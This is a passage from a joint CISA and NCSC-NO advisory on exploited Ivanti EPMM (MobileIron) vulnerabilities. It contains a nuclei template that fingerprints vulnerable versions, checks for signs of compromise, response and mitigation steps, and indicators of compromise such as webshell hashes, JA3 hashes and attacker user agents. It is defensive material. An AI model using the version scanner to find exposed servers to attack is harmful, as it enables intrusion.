    - https://nvd.nist.gov/vuln/detail/CVE-2023-35081

  description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server.

  tags: ivanti, mobileiron, epmm

 

requests:

  - method: GET

    path:

      - "{{RootURL}}/mifs/c/windows/api/v2/device/registration"

 

    matchers-condition: and

    matchers:

                   

      - type: status

        status:

          - 200

       

      - type: regex

        part: all

        regex:

          - '.*?VSP ((0?[0-9]|10)(.d+){1,3}|11.(0?[0-7])(.d+){1,2}|11.8.0(.d+)?|11.8.1.[0-1]|11.9.0(.d+)?|11.9.1.[0-1]|11.10.0.[0-2]).*'

Run the following NCSC-NO-created checks to check for signs of compromise:

  1. Investigate logs in centralized logging solutions or forwarded syslogs from EPMM devices for any occurrences of /mifs/aad/api/v2/.
  2. Look for spikes or an increase of EventCode=1644 in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662, 5136, and 1153.
  3. To detect tunneling activity through Sentry, look for traffic from EPMM devices to other internal servers, as well as TLS traffic towards instances of EPMM with different TLS certificates than the instance itself would possess. Traffic to EPMM with certificates originating from endpoints further inside the network, e.g. standard Windows generated certificates such as CN=EXCHANGE01 or similar.
  4. Perform forensic analysis of disk and memory since log retention may be poor and threat actors have been observed deleting log entries. Pay particular attention to unallocated disk space (free space on filesystem).
  5. Check for activity from ASUS routers in your own country towards EPMM and Sentry devices.

INCIDENT RESPONSE

If compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  5. Report the compromise to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870) or to NCSC-NO via NCSC-NO's 24/7 Operations Center ([email protected] or +47 23 31 07 50).

MITIGATIONS

CISA and NCSC-NO recommend organizations:

  • Upgrade Ivanti EPMM versions to the latest version as soon as possible. See Ivanti CVE-2023-35081 - Remote Arbitrary File Write for patch information. This patch protects against CVE-2023-35078 and CVE-2023-35081.
    • See the Evidence of Vulnerability Methods section of this advisory for CISA-developed nuclei templates to find any EPMM versions vulnerable to CVE-2023-35078 and CVE-2023-35081.
    • Organizations using unsupported versions (i.e., versions prior to 11.8.1.0) should immediately upgrade to a supported version. If you cannot immediately upgrade, apply the Ivanti-provided RPM fix for CVE-35078 (this workaround does not protect against CVE-2023-35081):
  • Treat MDM systems as high-value assets (HVAs) with additional restrictions and monitoring. MDM systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
  • Follow best cybersecurity practices in production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and NCSC-NO also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started: 

  1. Select an ATT&CK technique described in this advisory (see Table 1–Table 7).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability

[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write

[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions

[4] CISA: Top Routinely Exploited Vulnerabilities

RESOURCES

ACKNOWLEDGEMENTS

Ivanti contributed to this joint advisory.

NCSC-NO wishes to acknowledge Mnemonic’s contributions.

VERSION HISTORY

August 1, 2023: Initial version.

August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.

APPENDIX: INDICATORS OF COMPROMISE

NCSC-NO observed the following webshell hash:

c0b42bbd06d6e25dfe8faebd735944714b421388

NCSC-NO observed the following hash of mi.war:

1cd358d28b626b7a23b9fd4944e29077c265db46

NCSC-NO observed the following JA3 hashes used against MobileIron Core:

2d5bd942ebf308df61e1572861d146f6

473cd7cb9faa642487833865d516e578

579ccef312d18482fc42e2b822ca2430

849d3331f3e07a0797a02f12a6a82aa9

8d9f7747675e24454cd9b7ed35c58707

ad55557b7cbd735c2627f7ebb3b3d493

cd08e31494f9531f560d64c695473da9

e1d8b04eeb8ef3954ec4f49267a783ef

e60dc8370ecf78cf115162fbc257baf5

e669667efb41c36f714c309243f41ca7

e84a32d43db750b206cb6beed08281d0

eb5fdc72f0a76657dc6ea233190c4e1c

NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry:

0092ce298a1d451fbe93dc4237053a96

00e872019b976e69a874ee7433038754

01ecd9ab9be75e832c83c082be3bdf18

0212a88c7ed149febdefa347c610b248

02be3b93640437dbba47cc7ed5ab7895

03f8852448a85e14f2b4362194160c32

045f8ccdac6d4e769b30da406808da71

04e7f5787f89a597001b50a37b9f8078

070f9fe9f0ec69e6b8791d280fde6a48

07a624d7236cca3934cf1f8e44b74b52

09df72c01a1a0ad193e2fff8e454c9c4

0b28842d64a344c287e6165647f3b3fe

0b8e1211de50d244b89e6c1b366d3ccf

0cb0380cf75a863b3e40a0955b1ada9f

0da24834056873a8cd8311000088e8be

0e1fad8ffaa7a939f0a6cbf9cd7e2fcd

0f6e78839398c245d13f696a3216d840

119f8c9050d1499b6f958b857868b8ce

11c506d5e3fb7e119c4287202c96a930

1336df27f94b25a25acac9db3e61e461

14671c3f8deca7d73a03b74cb854c21d

146caf9bd0153428f54e9ef472154983

14994353f3ea6fd25952a8c7d57f9ecf

151bc875df15d1385e6eb02f9edaba06

15a074a397727b26a846b443b99c20ff

1660f3d882a4311ca013ee4586e01fd9

16a74fc216f8a4ce43466bb83b6d3fd2

188623fdd056c4ed13d1ff34c7377637

19f51486abd40c9f0fc0503559a6c523

1a024e63721c610d2e54e67d62cd5460

1aa7dae8f2ae0a29402ed51819f82db4

1abfdeaadb74a0f7c461e7bab157b17f

1b6720ed0b67c910a80722ce973d6217

1b7d9368c6ce7623fdbc43f013626535

1e0850e10a00c9bbdd5c582ff4cb6833

1ec71612e438cf902913eec993475eb9

206fed3a39d9215c35395663f5bb3307

22cc1b3bc9f99d3a520ae58fee79a0d5

23e3e6fa8b23d9bc19e82de4e64c79e9

253fd4659bf21be116858bc0f206c5b9

276e175d4fe8454c4c47e966d8cb3fa3

289a450c7478dd52a10c6ed2fb47f7e9

2aa8ba7478b1362274666d714df575bc

2beecb6b9e386f29d568229a9953c3d2

2ebc7fdceaa9a0df556e989d77157006

3003024afe64b4e8a5a30825c14bbb12

3082e669dda9d023e2dcd8b9549a84a8

309d33c6f77a3fc75654c44c61596ccd

30a9f568eb3df79352fc587a078623b6

30be84e6b95f44c203f8e7fce7339a8e

3268a5097a543c7dbd82c39a9193b7fe

32775ead3ea1ad7db2f4bea67fe0cabb

34ac9a6ef5d285119abec50fbe41fcfe

34d92552e278710c1e84f0bd8dc3a6b8

361f47a6357cc6e3a9bcdd20cfaaf0e9

3685abc75517e61e47e52e5f2d060f54

3744004013135b9f9a05cb58cda8134d

37d952966ea7e79277803f13d7147544

391a4c2c7541b8b78e2f99bf586e9794

393662e5aa0cb49c5d666a6d10a1ade6

3962b622c5aa815afb803b92aa948424

3b22af324abded2781ed8f6a61f3654f

3b30b4555cc8b4b164ad03cf322cbea8

3bd1bdb5e90b9590a8878bff2ada8204

3be529eb3a7daaf34f963a22188f6139

3dd13faad1c45eb0c23e4567210f7eac

403273b51f91cf3c333695e5532cb2c3

404f56045e436d53ead2177bf957ba39

41854adbc73b0b58e5c566f60bb0df25

43c22dabb1e6d2449a39c2f7e974d537

476e72bbda5b78d188766139889e3038

4898a51256ae7d914a5ffd5695973470

49230c486f0fd383cd301fe162d6a786

4959a611b9885022d81b4bc8e4b1d149

495c6ff7ca0379ad0891bac47917d09a

49d2bd08038dc7dada221008591940f9

4c1b73ec52e6eec0c5d20577fcbc9ef1

4d34db639ba84b11822fb3dac47ed7d1

5244b163f9326a1e5eaa8860f7543f99

539f1a5183800a96228458932f9307f7

5466368d4659f1b1470bcb09e65b484d

549cde6535a884126755fc53f59a820c

555389e92c622b87d3fc395fd8723501

588d0b42e54174a98e1eca59945e8b32

58bc21d305a65c41745327f142f3ac12

59401c9a60449c742d073d93d1b7039a

59eec218522cc5c7743a0d37892a3345

59faf75430e9326d3ae9d231bb3ae8c6

5d0259ca16cfc2d7d1b0fac69f29ab05

5d55026fb84dba91ac01e2095504b1bc

5e35f50c692081fd6c7ddac1272e2d6c

5f4d5965af741bba59b7c8d3425f33dd

6010282004917ecf3900babf61456432

6088c2a04c94cdcd5a283a6d1622ffba

61dee38d2f97220efb1218ad8971e3ab

62ac194f2526eb45485526bca35c8f43

634296a023280d020674c873d0199760

635755dadfab8b92fb502aafb09122db

63fc58be0d7b48eaa34da7f752ae8ae6

6441640409815cfb4bf469e685e1bdb5

646973d1928c401ba80961c12cbf84a2

65eef0a0ee257254ef0418aa57192cfb

66f6a192083a7ab00ae8e0b5cc52e8f4

67a42e2e27ffc26d1f3d0ceb8384afd0

689385f1218e0d4c347595648ca6a776

692f91c0c5e9e93e0a24bd3392887ca1

69ecf52960c8bd9e746dfe9ee19c11f6

6e359f3bbc622e9b1ed36f6e3d521bcf

6e3650528f719fc50988a1f697644832

6ead0d5d3f87911c27f3ae0a75e6b5bc

6f1fa8b444caf0d8238f948279ca74e1

6fb8cdf567dd7d89d53b5771d769cb5f

706b6055658aff067ae370f23831ef6b

708140c311d3d69418f75c928e7535a0

719ec5da8f2153a436ee8567ff609894

7292ef4cdca529071fad97496e1c9439

74871691eac48156ce0da2cfa3ab401a

74cf24f2a66a31c88b6fcfe01f12160c

75e874d8e0a79697633b87ea5e798b1c

76c0d09fed2f33babb0de8ee2c07144c

77a01363fa2b29af25c004da9570e23c

78988c65e9b70e7929e747408d8f0b0e

79c6d12d168b85437384b20eb94e106b

7b4137b4e85f31a81bb5bafeda993947

7b9db1d58326c1fa276ba2a39bcc2617

7cbc7459db5327c26476549f225030f5

7cd727171c2522f51417edeeba4f1791

7e3630c67c802eabb67b108ad4d7ded7

802f5d34c230da40c0912a1c5a9b702b

80bd0f3610f6c4d60584a5be0b8a3016

819030799f0020ed724c2ef3ffaa56c6

8207129585da68066ed08e94216d76ee

821f649d08687e22f96cea99fbb5d3a3

830838cb0620d659405a74401cd72557

833d3201066f5184c874c73a2083c448

840f488b7c0a5d686d1e89908735f354

84301b967a4d9a242466c04901bad691

85c3fac6a9885362c448f434671e362f

883b9fe16e45c388968defc73a5fba7a

8a6b0ba3496eeca39d6d3f9bae830c90

8ad0fd4b78c89bd63b97343fda1eeccb

8b0ae9029974091df12210255aaecad6

8b297f8b219e968932293ee7a8242ca3

8bb1781e756a53cd00d9b2ec670fa21e

8d5515351afdf27b013f96a05bf45147

8fafa73e9985e05d0c1c964da770c567

905967b08bd44cfa60d969229921ac23

9188ef45ea917a91ec9b92b5dd8cd90d

918dfab0333ae15d61f14fd24b5eaaac

922a3272aad17c9eaad733696a4321da

9253399537fad8448f1d4732dd79f6fa

934a8a6528e91caa019acb76e791a71d

95588e0386206fa02912cfcaf18c1220

9610328cdaa4694800c2c93410f8ce82

9622902cc43f4a20d0d686a37e4d8232

96c41e4c4a1812187fb279b9299ad63b

984c4653a563b19c87f264611a6adc01

9980febfaf901d4113a1c473f79d7eb6

9a176d818edff838fc057cea3ee372c0

9ba21c5148913186a5bf877078cbc048

9cfda02ef7e04c469b77f8197a249c17

9d74d395bd2f72a47a5c980e6040df5a

9df128ebe0c82064aa746647883112c9

9e5613533972a9d42d2e3344a4e58566

9ec17429eed5446e3720796ab50d8c60

9f2438aaab4744c4b7b5b7287a783099

9f3bf94572344b36f6ef1689cb30c66e

9fdd7a85b3a4ef8ded73beb3e6218109

a1b732a9af792f75a68ed78d72ffb8f6

a260d836428cdb971bdf147ca6940160

a4f11b1eb659869a0ae70898a4a0e5ee

a596ebbcf438980c880d711315e4fdf1

a80b6a354b493264f37aa39d0d41b5fc

a89df6156eb5a2de196388d4a123b470

a96837fe533247abb7f88000d0216a50

a98cf0a359f430a00f4f3d522f5b6cc0

aa2fe3a253e169b05e1782ca57a688d2

aef0172a2c03f77912de0bbf14aee00f

af06c3e72f2f307515ba549174d8e5a6

b311ab82b30f41b12cb9089d00c4a1ff

b4f31423445b5f13675f205ac997f41f

b50666c9aed1c2f222c56b6e9b326d27

b53f179b3f25f72bb0c7ccf45bf8beee

b57f3e41c03803306b0ee2111f7ef823

b79434613820faf30d58f103c4415a29

b8366aaa5ed51c0dea3fc90ef7e14889

b8f6b0d234a305c25411e83fd430c624

b956ed2b848dabb4e79ab7358233861b

b9ecb08402df0f1f6e1ce76b8ad6e91f

ba4a616c8d4ab9358a82b321d8e618bf

bcd62f3e029f96f62c24d50d2d1402ac

bcf75736d176394f3df69f3e0ef7dd9f

be1f24457141d80206bc2e58f55dc879

c013f308d170aa2eca4a5b0f0bbd3ccb

c0a2fd066c955137036f92da2c3a3ff1

c17b3ec40ed5216e44311138aafaea2c

c262a39f49604f05a5656213f758cd46

c66f36eb180438882133717c3abb5157

c986c7bf720ce1463c3d628d2b3dad01

c9c16287cbbe5a037244e374ba84aecc

cbcd728a2350712b5747cd3447473deb

cbeeb123efe8cf7f842426b673415c28

ccb15eef4287c8efa472915bcb4ec458

ccdddb69e9344a039c4ac9c49a6f2d7b

cd1312be032256a10cf866af3e9afae9

ce0dd163d9e02bfd42d61024523cb134

ceef2e728db1b5ae15432f844eeb66e1

d12d98a0877f6e3c8b5a59f41cc4de9b

d131f17689f1f585e9bfdcdb72a626bb

d173076d97a0400a56c81089912b9218

d255291bb8e460626cb906ebacc670e5

d2cea317778ad6412c458a8a33b964fd

d3cfee76468a9556fd9d017c1c8ee028

d3d72f4c7038f7313ad0570e16c293bf

d485a1b5db2f97dc56500376d677aa89

d662d20507bebc37b99a4d413afa2752

d711d577b9943ab4e2f8a2e06bb963e3

d92e87d2689957765987e2be732d728e

d966c6c822122e96f6e9f5f1d4778391

daee31d7cc6e08ead6afad2175989e1d

dbb293176747fa1c2e03cbc09433f236

dc26ef761c7ec40591b1fe6e561b521d

dc9e6edeb7557bc80be68be15cebb77a

dddfbae77336120febd5ad690af3e341

e1f579227327ebb21cde3f9e7511db01

e3c642432a815a07f035e01308aaa8fc

e54329351788661f2a8d4677a759fc42

e82b7ad2c05f4617efbc86a78c1e61e9

e99cffa2afa064625f09e1c5aca8f961

ea6bd3db104ca210b5ad947d46134aaf

eb277d809a59d39d02605c0edd9333e9

ed82a50d98700179c8ae70429457477a

ef35374f4146b3532f0902d6f7f0ef8c

ef4c4d79f02ac404f47513d3a73e20c7

f05a5a60ad6f92d6f28fa4f13ded952f

f0776dfe17867709fdb0e0183ed71698

f20fbfd508e24d50522eadf0186b03eb

f3d751b0585855077b46dfce226cfea1

f4dd9bb28d680a3368136fb3755e7ea9

f804388f302af1f999e4664543c885a1

f8bcc8f99a3afde66d7f5afb5d8f1b43

f8d6f89aecf792e844e72015c9f27c95

f967460f8c6de1cedb180c90c98bfe98

f9d5cc0cbae77ea1a371131f62662b6b

fa4f1a3b215888bc5f19b9f91ba37519

fdff2bf247a7dad40bac228853d5a661

fe6e7fac4f0b4f25d215e28ca8a22957

fe9de1cdd645971c5d15ee1873c3ff8d

febba89b4b9a9649b3a3bf41c4c7d853

NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

NCSC-NO observed the following user agents communicating with Exchange webshell:

Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7

Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7

Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36

Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36

Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1

NCSC-NO observed the following user agents communicating with Exchange Autodiscover:

ExchangeServicesClient/15.00.0913.015

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0

NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

NCSC-NO observed the following user agent communicating with Exchange (/powershell):

Windows WinRM Client